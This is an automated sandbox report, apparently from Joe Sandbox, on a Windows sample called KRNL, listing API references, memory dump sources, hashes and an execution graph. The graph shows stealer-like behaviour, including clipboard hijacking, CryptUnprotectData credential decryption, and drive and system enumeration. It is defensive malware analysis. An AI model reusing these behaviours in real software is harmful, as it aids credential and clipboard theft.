                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070321E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                          • Opcode ID: 991185f91c5ee31166b569b684eb36de0b794b37d1f18b7581a5b5c4e6ed1083
                                                                                                                                                                                                                                                          • Instruction ID: a9086f0b60c8ade8bd266190ba8c979d4e71fcc7c679fa586c044d0fce26910a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 991185f91c5ee31166b569b684eb36de0b794b37d1f18b7581a5b5c4e6ed1083
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E11D6B1501119FEE7112BB5AC8ACFF6A9DEEC97947104219FA01D1181FF78EF0141B5
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 006EE899
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006EE8A3
                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 006EE8BA
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 006EC1F6
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 006EC210
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006EE914
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1383202999-0
                                                                                                                                                                                                                                                          • Opcode ID: 7ac5ea129ff14389ee37ed9e4ed59ef047d07906554cd1d984d78d00750049b0
                                                                                                                                                                                                                                                          • Instruction ID: 46f2b251a2012147f147dc9994ce2ea67eddd5552831ab63fe3d3d4622eec8b7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ac5ea129ff14389ee37ed9e4ed59ef047d07906554cd1d984d78d00750049b0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C01102358023959BCB01EBAAC9056BE77A3AF80320F25411DE4016B2C2CF34AE01CB89
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000), ref: 0070ADB7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?,?,00703CD6,00000000), ref: 0070ADC3
                                                                                                                                                                                                                                                            • Part of subcall function 0070AE20: CloseHandle.KERNEL32(FFFFFFFE,0070ADD3,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?), ref: 0070AE30
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 0070ADD3
                                                                                                                                                                                                                                                            • Part of subcall function 0070ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0070AD91,0070A2DC,?,?,00704390,?,00000000,00000000,?), ref: 0070AE08
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?), ref: 0070ADE8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
                                                                                                                                                                                                                                                          • Instruction ID: 54fb4119b60394895a47349dd540aa8b5fabbcf1881a54a8a71d65eaf9f8c03a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF01236600229FBCF221FD9EC089DA3F66FF047A1F00C111FE08851A4D73AC8609B95
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006F0507
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006F0516
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 006F051F
                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 006F052C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
• Instruction ID: 624c8c8d1f7abbc2243d2be23e1d6b62d8ad55043a06f7365ffe7eb9ae28115f
• Opcode Fuzzy Hash: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
• Instruction Fuzzy Hash: 48F05F74D1120DEBCB00DFB8DA499DEBBF4FF1C200B918995A452E6150EA34AB44DB54
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006FB893,?,?,00000000,00000000,00000000,?), ref: 006FB9B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: f5a3b55e5c72e0b2502ddb70ff912645718bdc90155dd271cfbeda2eb29666be
• Instruction ID: 8b49dbc0d829e7cd1ab3b9344a7dec2ba2566e6f805eba058c645a48167d4bfa
• Opcode Fuzzy Hash: f5a3b55e5c72e0b2502ddb70ff912645718bdc90155dd271cfbeda2eb29666be
• Instruction Fuzzy Hash: 4241347290020DAFCF15DF98CC81AEEBBB6FF48300F189199FA14A7222D3759950DB91
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 006FB475
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
• Opcode ID: bd59a1eb5dda5866b79bd2c7b59a12665f0afe7042a8db01c5d4b2234511d839
• Instruction ID: 6e1dd83ed214097eb2670d2ff6bff18461d0fc674b79f14ba522985c299029a0
• Opcode Fuzzy Hash: bd59a1eb5dda5866b79bd2c7b59a12665f0afe7042a8db01c5d4b2234511d839
• Instruction Fuzzy Hash: B431D57250021DEBCF269F90CD448FE7B67FF09315B18965AFA544A222C33ADD61DB81
APIs
• __alloca_probe_16.LIBCMT ref: 006EB8B9
• RaiseException.KERNEL32(?,?,?,?,?), ref: 006EB8DE
  • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,02924DA0,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
  • Part of subcall function 006F8353: IsProcessorFeaturePresent.KERNEL32(00000017,006FC224), ref: 006F836F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
• String ID: csm
• API String ID: 1924019822-1018135373
• Opcode ID: 9ca096931ade157abe73758a3670340521f7aa8b33080543203f7b3cf4cd8428
• Instruction ID: c3957d0d1d5e4f673619f74532783bb5e4c57914bfb5cba4ce5e8a39211888e7
• Opcode Fuzzy Hash: 9ca096931ade157abe73758a3670340521f7aa8b33080543203f7b3cf4cd8428
• Instruction Fuzzy Hash: DD215531E02358EBCF249F9AD945AEFB7BAAF54710F14540AE405AB350CB70AD458B81
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ___std_exception_copy
• String ID: bad array new length$ios_base::badbit set
• API String ID: 2659868963-1158432155
• Opcode ID: d2b0de6f9a33efe203d3a6bca6d609cf212f142b6367e3e1300e0f03bef70bee
• Instruction ID: a495ef1df2cbff79822e63290eb82af11f077fea2c9069ed9ed00fe9c6958118
• Opcode Fuzzy Hash: d2b0de6f9a33efe203d3a6bca6d609cf212f142b6367e3e1300e0f03bef70bee
• Instruction Fuzzy Hash: 9F01DFF1609305EBDB14DF28D856A6B7BE9AF08318F11892CF45D8B381D379E848CB85
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,02924DA0,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction ID: 604c0ce2b604bc0234580df0db794dc208271eba5c89ba3b93fdbdc1fe117293
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F8F1614300EBE710AF58D846757BBE8EB58718F11892CF5989B381D3B9D894CB92

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:6.2%
                                                                                                                                                                                                                                                          Signature Coverage:52.9%
                                                                                                                                                                                                                                                          Total number of Nodes:257
                                                                                                                                                                                                                                                          Total number of Limit Nodes:19
                                                                                                                                                                                                                                                          execution_graph 33930 4086c0 33931 4086cd 33930->33931 33932 4087f7 ExitProcess 33931->33932 33933 4087e0 33931->33933 33934 4086e2 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 33931->33934 33935 4087e9 33933->33935 33936 408710 33934->33936 33949 43cca0 FreeLibrary 33935->33949 33936->33936 33945 43b180 33936->33945 33939 408749 GetForegroundWindow 33941 4087cf 33939->33941 33941->33933 33948 40cbe0 CoInitializeEx 33941->33948 33950 43e6b0 33945->33950 33947 43b18a RtlAllocateHeap 33947->33939 33949->33932 33951 43e6c0 33950->33951 33951->33947 33951->33951 33952 40e042 33956 409570 33952->33956 33954 40e04e CoUninitialize 33955 40e070 33954->33955 33957 409584 33956->33957 33957->33954 34185 43ce81 GetForegroundWindow 34186 43ceaa 34185->34186 33958 410247 33960 41025a 33958->33960 33959 40ea1d 33960->33959 33961 41048f RtlExpandEnvironmentStrings 33960->33961 33962 4104f6 33961->33962 33962->33959 33963 41057a RtlExpandEnvironmentStrings 33962->33963 33963->33959 33965 4105f1 33963->33965 33966 4148a0 33965->33966 33967 4148c0 33966->33967 33967->33967 33971 4400c0 33967->33971 33970 414a2d 33975 440400 LdrInitializeThunk 33970->33975 33972 4400e0 33971->33972 33972->33972 33973 4401fe 33972->33973 33976 43cd20 LdrInitializeThunk 33972->33976 33973->33970 33975->33970 33976->33973 33977 42b6c8 33978 42b6e3 33977->33978 33981 437960 33978->33981 33982 43796e 33981->33982 33985 437a52 33982->33985 33990 43cd20 LdrInitializeThunk 33982->33990 33984 42b827 33985->33984 33987 437b58 33985->33987 33989 43cd20 LdrInitializeThunk 33985->33989 33987->33984 33991 43cd20 LdrInitializeThunk 33987->33991 33989->33985 33990->33982 33991->33987 33992 58a1000 33993 58a1102 33992->33993 33994 58a1012 33992->33994 
33995 58a103a OpenClipboard 33994->33995 33996 58a1030 Sleep 33994->33996 33997 58a104a GetClipboardData 33995->33997 33998 58a10f9 GetClipboardSequenceNumber 33995->33998 33996->33994 33999 58a105a GlobalLock 33997->33999 34000 58a10f3 CloseClipboard 33997->34000 33998->33994 33999->34000 34001 58a106b GlobalAlloc 33999->34001 34000->33998 34003 58a10e9 GlobalUnlock 34001->34003 34004 58a109d GlobalLock 34001->34004 34003->34000 34005 58a10b0 34004->34005 34006 58a10b9 GlobalUnlock 34005->34006 34007 58a10cb EmptyClipboard SetClipboardData 34006->34007 34008 58a10e0 GlobalFree 34006->34008 34007->34003 34007->34008 34008->34003 34009 42bb4d 34010 42bb80 34009->34010 34011 42bc8e 34010->34011 34013 43cd20 LdrInitializeThunk 34010->34013 34013->34011 34187 43328c 34188 433291 34187->34188 34189 4332c7 GetSystemMetrics GetSystemMetrics 34188->34189 34190 433306 34189->34190 34014 43b1d0 34015 43b1f0 34014->34015 34015->34015 34017 43b23e 34015->34017 34024 43cd20 LdrInitializeThunk 34015->34024 34016 43b421 34017->34016 34018 43b180 RtlAllocateHeap 34017->34018 34021 43b2d1 34018->34021 34023 43b33e 34021->34023 34025 43cd20 LdrInitializeThunk 34021->34025 34026 43b1a0 34023->34026 34024->34017 34025->34023 34027 43b1b3 34026->34027 34028 43b1c4 34026->34028 34029 43b1b8 RtlFreeHeap 34027->34029 34028->34016 34029->34028 34191 43fb10 34192 43fb1f 34191->34192 34193 43fc8f 34192->34193 34201 43cd20 LdrInitializeThunk 34192->34201 34194 43fee9 34193->34194 34195 43b180 RtlAllocateHeap 34193->34195 34197 43fd27 34195->34197 34199 43fdee 34197->34199 34202 43cd20 LdrInitializeThunk 34197->34202 34198 43b1a0 RtlFreeHeap 34198->34194 34199->34198 34201->34193 34202->34199 34203 40cc13 CoInitializeSecurity 34030 4404d0 34032 4404f0 34030->34032 34031 4405fe 34034 44054e 34032->34034 34036 43cd20 LdrInitializeThunk 34032->34036 34034->34031 34037 43cd20 LdrInitializeThunk 34034->34037 34036->34034 34037->34031 34038 42ebd5 CoSetProxyBlanket 34047 43d0d9 34048 43d0f0 
34047->34048 34050 43d15e 34048->34050 34054 43cd20 LdrInitializeThunk 34048->34054 34053 43cd20 LdrInitializeThunk 34050->34053 34052 43d242 34053->34052 34054->34050 34204 43d81f 34205 43d830 34204->34205 34208 43cd20 LdrInitializeThunk 34205->34208 34207 43d99c 34208->34207 34209 4174a1 34211 417604 34209->34211 34212 417630 34209->34212 34213 4174ad 34209->34213 34211->34211 34211->34212 34215 41caa0 LdrInitializeThunk 34211->34215 34214 440250 LdrInitializeThunk 34213->34214 34214->34211 34215->34212 34056 40b262 34058 40b26e 34056->34058 34059 40b277 34056->34059 34057 43ccc0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap 34057->34059 34059->34057 34059->34058 34060 42ce60 34061 42ce80 34060->34061 34062 42cf78 GetPhysicallyInstalledSystemMemory 34061->34062 34063 42cfb0 34062->34063 34063->34063 34216 420f20 34217 420f2e 34216->34217 34219 420f80 34216->34219 34220 421040 34217->34220 34221 421050 34220->34221 34221->34221 34222 440250 LdrInitializeThunk 34221->34222 34223 42113f 34222->34223 34224 426520 34225 426540 34224->34225 34227 42659e 34225->34227 34234 43cd20 LdrInitializeThunk 34225->34234 34226 426982 34227->34226 34229 43b180 RtlAllocateHeap 34227->34229 34231 426632 34229->34231 34230 43b1a0 RtlFreeHeap 34230->34226 34233 4266ae 34231->34233 34235 43cd20 LdrInitializeThunk 34231->34235 34233->34230 34234->34227 34235->34233 34064 40d263 34065 40d275 34064->34065 34068 437cf0 34065->34068 34067 40d313 34067->34067 34070 437d50 CoCreateInstance 34068->34070 34071 4381fe 34070->34071 34072 437e1e SysAllocString 34070->34072 34073 43820e GetVolumeInformationW 34071->34073 34075 437eb7 34072->34075 34082 438228 34073->34082 34076 437ebf CoSetProxyBlanket 34075->34076 34077 4381ed SysFreeString 34075->34077 34078 4381e3 34076->34078 34079 437edf SysAllocString 34076->34079 34077->34071 34078->34077 34081 437fb0 34079->34081 34081->34081 34083 437fea SysAllocString 34081->34083 34082->34067 34086 438011 34083->34086 34084 4381cb SysFreeString 
SysFreeString 34084->34078 34085 4381c1 34085->34084 34086->34084 34086->34085 34087 438059 VariantInit 34086->34087 34089 4380b0 34087->34089 34088 4381b0 VariantClear 34088->34085 34089->34088 34236 414e25 34237 414e30 34236->34237 34238 415037 CryptUnprotectData 34237->34238 34238->34237 34090 40e568 34091 40e56e 34090->34091 34094 4116a0 34091->34094 34093 40e577 34104 41172e 34094->34104 34095 41182c 34095->34093 34096 411d88 RtlExpandEnvironmentStrings 34096->34104 34097 41206f RtlExpandEnvironmentStrings 34097->34104 34098 41328c CreateThread 34098->34104 34099 4122c0 RtlExpandEnvironmentStrings 34099->34104 34102 43b1a0 RtlFreeHeap 34102->34104 34103 43cd20 LdrInitializeThunk 34103->34104 34104->34095 34104->34096 34104->34097 34104->34098 34104->34099 34104->34102 34104->34103 34105 43ff00 LdrInitializeThunk 34104->34105 34106 440650 LdrInitializeThunk 34104->34106 34105->34104 34106->34104 34107 435b68 34110 435b88 34107->34110 34108 435bf1 34110->34108 34111 43cd20 LdrInitializeThunk 34110->34111 34111->34110 34112 43d5e8 34114 43d4f2 34112->34114 34113 43d59e 34114->34113 34116 43cd20 LdrInitializeThunk 34114->34116 34116->34113 34239 436b2d 34240 436b45 34239->34240 34241 436b5e GetUserDefaultUILanguage 34240->34241 34242 436b77 34241->34242 34243 40a8b0 34246 40a8f0 34243->34246 34244 40accd 34245 43b1a0 RtlFreeHeap 34245->34244 34246->34244 34246->34245 34246->34246 34247 42bab3 34249 42babf 34247->34249 34248 42c96b GetComputerNameExA 34249->34248 34249->34249 34250 40d4b6 34251 40d55e 34250->34251 34252 40d53f 34250->34252 34252->34251 34254 43cd20 LdrInitializeThunk 34252->34254 34254->34251 34117 423675 34118 423a01 34117->34118 34119 423816 34117->34119 34121 423686 34117->34121 34123 4239b9 34117->34123 34125 4236be 34117->34125 34126 42383d 34117->34126 34140 421570 34118->34140 34119->34118 34119->34123 34119->34126 34122 42369c RtlExpandEnvironmentStrings 34121->34122 34122->34118 34122->34119 34122->34123 34122->34125 34122->34126 
34123->34123 34124 423991 GetLogicalDrives 34127 440250 LdrInitializeThunk 34124->34127 34136 440250 34125->34136 34126->34124 34126->34126 34130 4239a8 34127->34130 34129 423d8a RtlExpandEnvironmentStrings 34129->34123 34129->34130 34132 424070 34129->34132 34130->34123 34130->34129 34130->34132 34169 43f450 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 34130->34169 34155 43f150 34132->34155 34137 440270 34136->34137 34138 4403ae 34137->34138 34170 43cd20 LdrInitializeThunk 34137->34170 34138->34119 34141 4400c0 LdrInitializeThunk 34140->34141 34143 4215b0 34141->34143 34142 421d72 34142->34123 34143->34142 34144 43b180 RtlAllocateHeap 34143->34144 34145 421612 34144->34145 34153 4216cb 34145->34153 34171 43cd20 LdrInitializeThunk 34145->34171 34147 421ca9 34148 43b1a0 RtlFreeHeap 34147->34148 34150 421cbb 34148->34150 34149 43b180 RtlAllocateHeap 34149->34153 34150->34142 34173 43cd20 LdrInitializeThunk 34150->34173 34153->34147 34153->34149 34154 43b1a0 RtlFreeHeap 34153->34154 34172 43cd20 LdrInitializeThunk 34153->34172 34154->34153 34156 43f160 34155->34156 34157 43f1be 34156->34157 34174 43cd20 LdrInitializeThunk 34156->34174 34158 4240a3 34157->34158 34160 43b180 RtlAllocateHeap 34157->34160 34158->34123 34165 43f040 34158->34165 34161 43f280 34160->34161 34164 43f30f 34161->34164 34175 43cd20 LdrInitializeThunk 34161->34175 34162 43b1a0 RtlFreeHeap 34162->34158 34164->34162 34167 43f060 34165->34167 34166 43f11f 34166->34123 34167->34166 34176 43cd20 LdrInitializeThunk 34167->34176 34169->34130 34170->34138 34171->34145 34172->34153 34173->34150 34174->34157 34175->34164 34176->34166 34177 4330fd 34178 433115 34177->34178 34181 4336e0 34178->34181 34182 433719 GetObjectW 34181->34182 34184 43380d 34182->34184
